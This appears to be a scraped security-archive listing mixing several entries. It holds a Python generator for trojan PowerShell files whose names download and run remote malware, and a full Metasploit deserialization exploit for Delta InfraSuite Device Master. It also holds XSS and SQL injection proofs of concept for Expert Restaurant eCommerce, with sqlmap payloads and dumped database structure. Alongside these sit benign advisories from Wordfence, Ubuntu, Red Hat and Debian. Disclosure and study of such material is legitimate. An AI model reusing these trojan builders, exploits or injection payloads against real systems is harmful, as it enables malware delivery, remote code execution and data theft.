This python script mints a .ps1 file with an exploitable semicolon condition that allows for command execution from Microsoft Windows PowerShell. This is an updated exploit to work with Python3.

    from base64 import b64encodeimport argparse,sys,os#PSTrojanFile.py#By hyp3rlinx (c) 2023#ApparitionSec#hyp3rlinx.altervista.org#twitter.com/hyp3rlinx#twitter.com/malvuln#PoC Video: https://www.youtube.com/watch?v=-ZJnA70Cf4I#============================================================================================#Create vulnerable Windows .PS1 (PowerShell) files with specially crafted exploitable names.#Example:#Test;POweRsHeLL -e [BASE64 PAYLOAD];.ps1#Testing;saps (gc -)PoC;.ps1##Updated for Python3 from my orginal 2019 script with added DLL support and fixes.#Creates malicious ".ps1" PowerShell files with embedded trojan filename commands.#Download, save and execute malware (EXE,DLL) all from within a PowerShell Filename.#Expects hostname/ip-address of web-server housing an executable.##Vectors:#Double-click, drag and drop to a PowerShell shortcut, command line.##Requirements:#=============#1) .PS1 files set to open and run with PowerShell as the default program #2) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force##By hyp3rlinx - apparitionSec#===========================================================================================BANNER="""   _ \    ___| __ __|           _)                ____| _)  |         |   | \___ \    |   __|  _ \   |   _` |  __ \   |      |  |   _ \   ___/        |   |  |    (   |  |  (   |  |   |  __|    |  |   __/  _|     _____/   _| _|   \___/   | \__,_| _|  _| _|     _| _| \___|                              ___/                                                      By hyp3rlinx                                                    (C) circa 2023"""#Console colorsRED="\033[1;31;40m"GREY="\033[1;30;40m"CYAN="\033[1;36;40m"YELLOW="\033[1;33;40m"ENDC = '\033[m' #Defaultdef parse_args():    parser.add_argument("-i", "--ipaddress", help="Remote server hosting a Malware.")    parser.add_argument("-m", "--local_malware_name", help="Name of the Malware on disk after download.")    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")    parser.add_argument("-t", "--type", help="Executable type EXE or DLL (required)")    parser.add_argument("-f", "--from_file", nargs="?", const="1", help="Execute commands from a local text-file named '-' (dash).")    parser.add_argument("-u", "--usage", nargs="?", const="1", help="Usage examples.")    return parser.parse_args()def show_usage():    print(RED+BANNER+ENDC)    print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i 127.0.0.1 -m hate.exe -r 1.exe  -t exe")    print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i x.x.x.x -m q.z -r s.dll -t dll"+ENDC)    def main(args):    PSEmbedFilenameMalwr=""    if args.usage:        show_usage()        return    if args.from_file: #Create PS1 file that executes code from a text-file using saps gc (get-content).        if create_file("",1):            success(1)    if args.ipaddress:        if not args.type:            show_usage()            print(YELLOW+"[!] "+GREY+"Provide the executable type DLL or EXE"+ENDC)            exit(1)        if args.type=="exe": #EXE saved to current dir where the vuln PS script is run.            PSEmbedFilenameMalwr = "iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O "+args.local_malware_name+";sleep -s 2;start "+args.local_malware_name        else: #DLL saved to users downloads directory.            PSEmbedFilenameMalwr = "saps "+"http://"+args.ipaddress+"/"+args.remote_malware_name+";sleep -s2;rundll32 $HOME/Downloads/"+args.local_malware_name+", 0"    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode()def success(obj):    print(RED+BANNER+ENDC)    print(GREY+"[+] PS1 Trojan File Created!")    if obj==1:        print(GREY+"[+] Added 'calc.exe' command to created file named '-' (dash)"+ENDC)def create_file(payload, local):    if local==1:        f=open("Testing;saps (gc -)PoC;.ps1", "w")        f2=open("-", "w")        f2.write("calc.exe")        f2.close()    else:        f=open("Test;PoWeRShell -e "+payload+";2.ps1", "w")    f.write("Write-Output 'Have a nice day GG!'")    f.close()    return Trueif __name__=="__main__":    os.system("color")    parser = argparse.ArgumentParser()    PSCmds = main(parse_args())    if len(sys.argv)==1:        print(RED+BANNER+GREY)        parser.print_help(sys.stderr)        print(ENDC)        sys.exit(1)    if PSCmds:        if create_file(PSCmds,0):            success(0)

Microsoft Windows PowerShell Remote Command Execution

WordPress Directorist plugin versions 7.5.4 and below suffer from insecure direct object reference and privilege escalation vulnerabilities.

**WordPress Directorist 7.5.4 Insecure Direct Object Reference / Privilege Escalation**

    Alongside our usual work to discover, report, and remediate vulnerabilities in the WordPress ecosystem, the WordPress Threat Intelligence team has been conducting a deep-dive into WordPress plugin code with the objective of finding methods to bypass authentication and gain elevated privileges in WordPress plugins so we can help developers patch these vulnerabilities before threat actors can exploit them.One such plugin we examined recently is Directorist, a popular tool used by over 10,000 WordPress sites to manage directory listings and classified ads.On April 3, 2023, our team uncovered two significant vulnerabilities – an Arbitrary User Password Reset to Privilege Escalation, and an Insecure Direct Object Reference leading to Arbitrary Post Deletion. Both vulnerabilities were found to affect Directorist versions 7.5.4 and earlier.Wordfence Premium,  Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting these vulnerabilities on April 4, 2023. Sites still using the free version of Wordfence received the same protection on May 4, 2023.Unfortunately, on June 1, 2023, the plugin was closed due to developer unresponsiveness, and it currently remains unavailable for download from the repository. This presents an issue as site owners are unable to request an update directly via their WordPress dashboard. Given this situation, we advise site owners to either temporarily uninstall the plugin, or manually download the patched version, 7.5.5, and upload it to their sites for optimal protection. For this reason, we have intentionally kept specific vulnerability details to a minimum in this post.Vulnerability Summaries from Wordfence IntelligenceDescription: Directorist <= 7.5.4 - Authenticated (Subscriber+) Arbitrary User Password Reset to Privilege Escalation Affected Plugin: Directorist – WordPress Business Directory Plugin with Classified Ads ListingsPlugin Slug: directoristAffected Versions: <= 7.5.4CVE ID: CVE-2023-1888CVSS Score: 8.8 (High)CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Alex Thomas Fully Patched Version: 7.5.5The Directorist plugin for WordPress is vulnerable to an arbitrary user password reset in versions up to, and including, 7.5.4. This is due to a lack of validation checks within login.php. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset the password of an arbitrary user and gain elevated (e.g., administrator) privileges.Description:   Directorist <= 7.5.4 - Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Deletion in listing_task Affected Plugin: Directorist – WordPress Business Directory Plugin with Classified Ads ListingsPlugin Slug: directoristAffected Versions: <= 7.5.4CVE ID: CVE-2023-1889CVSS Score: 7.2 (High)CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:NResearcher/s: Alex Thomas Fully Patched Version: 7.5.5The Directorist plugin for WordPress is vulnerable to an Insecure Direct Object Reference in versions up to, and including, 7.5.4. This is due to improper validation and authorization checks within the listing_task function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts.Technical AnalysisPassword Reset VulnerabilityDirectorist, created by wpWax, is designed to help businesses establish directory listings and classified ads on their WordPress sites. It includes a Login and Registration form that can be enabled using the [directorist_user_login] shortcode.The Directorist Login and Registration formThis form features a “Recover Password” function, akin to the default WordPress “lost your password?” feature. In vulnerable versions, the underlying code lacks essential validation checks to ensure that the user attempting to reset a password is indeed the account owner. This could allow attackers with subscriber-level permissions or higher to reset the passwords of other users, including administrators, thereby gaining unauthorized elevated privileges and taking over the site.Directorist “Recover Password” logicArbitrary Post Deletion VulnerabilityIn addition, we found an arbitrary post deletion vulnerability in the plugin. Directorist listings are essentially custom WordPress posts. In vulnerable versions, the code designed to manage listing deletions lacks the necessary authorization checks to confirm the user is permitted to delete the listing and does not verify that the post being deleted is a Directorist listing. Consequently, this could enable threat actors with subscriber-level and above permissions to delete any post on a WordPress instance, including posts by administrators.Directorist directory listing deletion logicDisclosure TimelineApril 3, 2023 – The Wordfence Threat Intelligence team discovers and documents two vulnerabilities in Directorist.April 4, 2023 – The Wordfence Threat Intelligence team releases firewall rules to Wordfence Premium, Wordfence Care, and Wordfence Response users and begins the responsible disclosure process.May 4, 2023 – Wordfence Free users receive the firewall rules.June 1, 2023 – The plugin developers release a patch in version 7.5.5 of Directorist.ConclusionIn this blog post, we reviewed two vulnerabilities in our ongoing vulnerability research focused on bypassing authentication and gaining elevated privileges – an Arbitrary User Password Reset to Privilege Escalation that allows threat actors to gain full control of a WordPress instance, and a less-severe Insecure Direct Object Reference to Arbitrary Post Deletion, both in Directorist versions 7.5.4 and prior.The Wordfence Threat Intelligence team reported these vulnerabilities to the Directorist team on April 4, 2023, following responsible disclosure protocols. The Directorist team addressed these vulnerabilities and released the patch in Directorist version 7.5.5 on June 1, 2023.We recommend all users update their Directorist plugin to the newest version available, which is 7.5.5 at the time of this writing, immediately to secure their websites.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting these vulnerabilities on April 4, 2023. Sites still using the free version of Wordfence received the same protection on May 4, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as these vulnerabilities pose a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Directorist 7.5.4 Insecure Direct Object Reference / Privilege Escalation

Delta Electronics InfraSuite Device Master versions below 1.0.5 have an unauthenticated .NET deserialization vulnerability within the ParseUDPPacket() method of the Device-Gateway-Status process. The ParseUDPPacket() method reads user-controlled packet data and eventually calls BinaryFormatter.Deserialize() on what it determines to be the packet header without appropriate validation, leading to unauthenticated code execution as the user running the Device-Gateway-Status process.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::Udp  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',        'Description' => %q{          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'          method of the 'Device-Gateway-Status' process.          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.        },        'Author' => [          'Anonymous', # Vulnerability discovery          'Shelby Pace' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-1133'],          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']        ],        'Platform' => 'win',        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Windows EXE Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'CmdStagerFlavor' => :psh_invokewebrequest            }          ],          [            'Windows CMD',            {              'Arch' => [ARCH_CMD],              'Type' => :windows_cmd            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-05-17',        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      Opt::RPORT(10100),      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])    ])  end  def check    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')    res = send_request_cgi(      'method' => 'GET',      'rport' => datastore['INFRASUITE_PORT'],      'uri' => normalize_uri(target_uri.path, 'login.html')    )    return CheckCode::Unknown unless res    unless res.body.include?('InfraSuite Manager Login')      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')    end    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')    res = send_request_cgi(      'method' => 'GET',      'rport' => datastore['INFRASUITE_PORT'],      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')    )    unless res&.body&.include?('var devicemasterCfg')      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')    end    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)    unless version && version.length > 1      return CheckCode::Detected('Failed to find version string')    end    version = version[1]    vprint_status("Found version '#{version}' of InfraSuite Device Master")    r_vers = Rex::Version.new(version)    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')    CheckCode::Safe  end  def exploit    connect_udp    case target['Type']    when :windows_dropper      execute_cmdstager    when :windows_cmd      execute_command(payload.encoded)    end  end  def execute_command(cmd, _opts = {})    serialized = ::Msf::Util::DotNetDeserialization.generate(      cmd,      gadget_chain: :ClaimsPrincipal,      formatter: :BinaryFormatter    )    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"    udp_sock.put(pkt)  end  def cleanup    disconnect_udp  endend

Delta Electronics InfraSuite Device Master Deserialization

Ubuntu Security Notice 6145-1 - It was discovered that Sysstat incorrectly handled certain arithmetic multiplications. An attacker could use this issue to cause Sysstat to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue was only fixed for Ubuntu 16.04 LTS. It was discovered that Sysstat incorrectly handled certain arithmetic multiplications in 64-bit systems, as a result of an incomplete fix for CVE-2022-39377. An attacker could use this issue to cause Sysstat to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6145-1  
June 07, 2023

sysstat vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Sysstat could be made to crash or run programs if it processed specially  
crafted data.

Software Description:  
- sysstat: system performance tools for Linux

Details:

It was discovered that Sysstat incorrectly handled certain arithmetic  
multiplications. An attacker could use this issue to cause Sysstat to  
crash, resulting in a denial of service, or possibly execute arbitrary  
code. This issue was only fixed for Ubuntu 16.04 LTS. (CVE-2022-39377)

It was discovered that Sysstat incorrectly handled certain arithmetic  
multiplications in 64-bit systems, as a result of an incomplete fix for  
CVE-2022-39377. An attacker could use this issue to cause Sysstat to  
crash, resulting in a denial of service, or possibly execute arbitrary  
code. (CVE-2023-33204)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   sysstat                         12.6.1-1ubuntu0.1

Ubuntu 22.10:  
   sysstat                         12.5.6-1ubuntu0.2

Ubuntu 22.04 LTS:  
   sysstat                         12.5.2-2ubuntu0.2

Ubuntu 20.04 LTS:  
   sysstat                         12.2.0-2ubuntu0.3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   sysstat                         11.6.1-1ubuntu0.2+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   sysstat                         11.2.0-1ubuntu0.3+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   sysstat                         10.2.0-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6145-1  
   CVE-2022-39377, CVE-2023-33204

Package Information:  
   https://launchpad.net/ubuntu/+source/sysstat/12.6.1-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.6-1ubuntu0.2  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.2-2ubuntu0.2  
   https://launchpad.net/ubuntu/+source/sysstat/12.2.0-2ubuntu0.3

Ubuntu Security Notice USN-6145-1

Expert Restaurant eCommerce version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20872/                                      ││  Vendor   : Expert IT Solution                                                         ││  Software : Expert Restaurant eCommerce 1.0                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /food_details.phpGET parameter 'food' is vulnerable to RXSShttps://www.website/food_details.php?food=e11c0"><script>alert(1)</script>uuf50[-] Done

Expert Restaurant eCommerce 1.0 Cross Site Scripting

Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20872/                                      ││  Vendor   : Expert IT Solution                                                         ││  Software : Expert Restaurant eCommerce 1.0                                            ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /food_details.phphttps://www.website/food_details.php?food=[SQLI]GET parameter 'food' is vulnerable to SQL Injection---Parameter: food (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV    Type: UNION query    Title: Generic UNION query (NULL) - 17 columns    Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: 'sagor_****_restu'fetching tables[34 tables]+--------------------------+| add_to_cart_view         || admin_url                || contact_manage           || currencies               || customer_info            || delivery_live_status     || expense_manage           || food_category            || food_dish_manage         || food_dish_vari_man       || food_field_variant       || food_field_variant_value || food_order_confirm       || food_review              || food_sub_category        || food_tag                 || gallery_manage           || hall_manage              || income_manage            || kitchen_live_sta         || menu_manage              || opening_manage           || order_accounts           || order_other_address      || page_manage              || payment_gateway          || shipping_charge          || site_setting             || slider_manage            || social_manage            || sup_ad_log               || table_book               || table_manage             || team_manage              |+--------------------------+fetching columns for table 'sup_ad_log'[5 columns]+----------------+--------------+| Column         | Type         |+----------------+--------------+| status         | varchar(100) || id             | int(11)      || sup_admin_name | varchar(100) || sup_pass       | varchar(100) || sup_user       | varchar(100) |+----------------+--------------+[-] Done

Expert Restaurant eCommerce 1.0 SQL Injection

Red Hat Security Advisory 2023-3410-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.20.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.12.20 bug fix and security update  
Advisory ID:       RHSA-2023:3410-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3410  
Issue date:        2023-06-07  
CVE Names:         CVE-2023-24540 CVE-2023-25652 CVE-2023-25815   
                   CVE-2023-29007   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.20 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.20. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3409

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:5c504578e34e8cf6eb70fad7a9bee92896b6d38d09b6d81891f730ee4f9d268b

(For s390x architecture)  
The image digest is  
sha256:f39a74c577e6a44e6ca8f8c85f68f51ecfae696d8a98b420ffb3422f33d82033

(For ppc64le architecture)  
The image digest is  
sha256:5deb523d09debbcec778e2afb432162c12edbc26ea28ab124b3d2c70179af3fe

(For aarch64 architecture)  
The image digest is  
sha256:716d3ff360306bff452cdf9aecb1499df48f188454a9d246d8ecdfe2d3e28fae

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10812 - Missing vCenter build number in telemetry  
OCPBUGS-11989 - "Create" button inactive when creating application with "Import from Git" workflow  
OCPBUGS-12202 - fail to create vSphere IPI cluster as apiVIP and ingressVIP are not in machine networks  
OCPBUGS-13173 - Bump to kubernetes 1.25.10  
OCPBUGS-13335 - [4.12] IPI redfish installation fails on inspect for EthernetInterfaces  
OCPBUGS-13432 - Got the `file exists` error when different digest direct to the same tag  
OCPBUGS-13647 - Wrong cleanup of stale conditions from OCPBUGS-2783  
OCPBUGS-13721 - aws-ebs-csi-driver-controller-sa ServiceAccount does not include the HCP pull-secret in its imagePullSecrets  
OCPBUGS-13819 - Bootstrap on aws should have same metadata service type as on other nodes  
OCPBUGS-13862 - Could not upgrade 4.12.16 SNO to 4.13.0-rc.7 because "operator cloud-controller-manager should not be upgraded between minor versions"  
OCPBUGS-13889 - unusual error log in cluster-policy-controller  
OCPBUGS-13943 - CPMS?create two replace machines when deleting a master machine on vSphere  
OCPBUGS-14014 - When releaseImage is a digest the create image command generates spurious warning  
OCPBUGS-14120 - Replacing master node on GCP IPI don't include new machine into the instance-group used for api-int lb  
OCPBUGS-14152 - e2e-agnostic-ovn-cmd is permanently failing due to registry.centos.org  
OCPBUGS-14236 - TestNewApp unit tests in oc are failing  
OCPBUGS-14299 - [4.12] Fast track BZ#2196441 (Network Manager)  
OCPBUGS-6061 - update sprig to v3 in cno  
OCPBUGS-7551 - When installing OCP on vsphere/nutanix failure with bootstrap destroy

6. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIEq1dzjgjWX9erEAQgm4RAAmU4jMFB/b9Z1aCKGoBat2Afmc48zwxU0  
0MR/I282wpS6x3h6YCFgBE0/Y3a+jRvX0AEoNC+2lwftiw8SId4lO5t9GuzdDrC5  
vQs/ciZZqLfzBl9FnI8Af13OZj3Esb/rloSU9m6J5r2lCRirI0YJl+U36JktwLux  
CoFYvkwLzTvkeAVXd/J1BjyO9H/a58CjWbJVl4ArithS1iaf1gtFZcjw57EL0b6p  
l+fLtJsrS0VeiNpGLTDzvmG++xtgXlTFoUyL/DG9h8iyIirxHOSBP4TMs54WdkQq  
SnrVDBOV0K9/a85R+iczo4ejUyXWNfjmfrKg7GuISnWdfJufbkQrAjjf8w5Qz6Yn  
0QkqBSjvEZ44+UzgFC2C5/eLD/ByNlKLbF4pfKMJhznEMLJ/1GWMvPZr6iHA3c/o  
LsCIG9qq4Vz5PsFnlpuMDSykm2TxrAIQXgn/F3/oznJO/lx/WokspjgPP9maluc6  
4/u1yuvZU+LvoI3W1QqSbHrB4UVD3pGZDL5g+5QJndhr+TklKwLgGFxpIrSjgqCm  
4F1AVLu8ECF0w0TMveS2xWQ5tZHbn6+XhEXg3fiTLmeBgj8uuWiuXA5yhfR2/lVA  
9nBmk/nudWe0ukE3e8xD/26o/hlA+Z3yMUcVg0x/ejjaknHFPic6Cp7ZpwRZB1w/  
xoJK4ur3/1c=  
=iWZa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3410-01

Debian Linux Security Advisory 5420-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5420-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3079Multiple security issues were discovered in Chromium, whichcould result in the execution of arbitrary code, denial of serviceor information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 114.0.5735.106-1~deb11u1.For the upcoming stable distribution (bookworm), these problems havebeen fixed in version 114.0.5735.106-1~deb12u1We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP 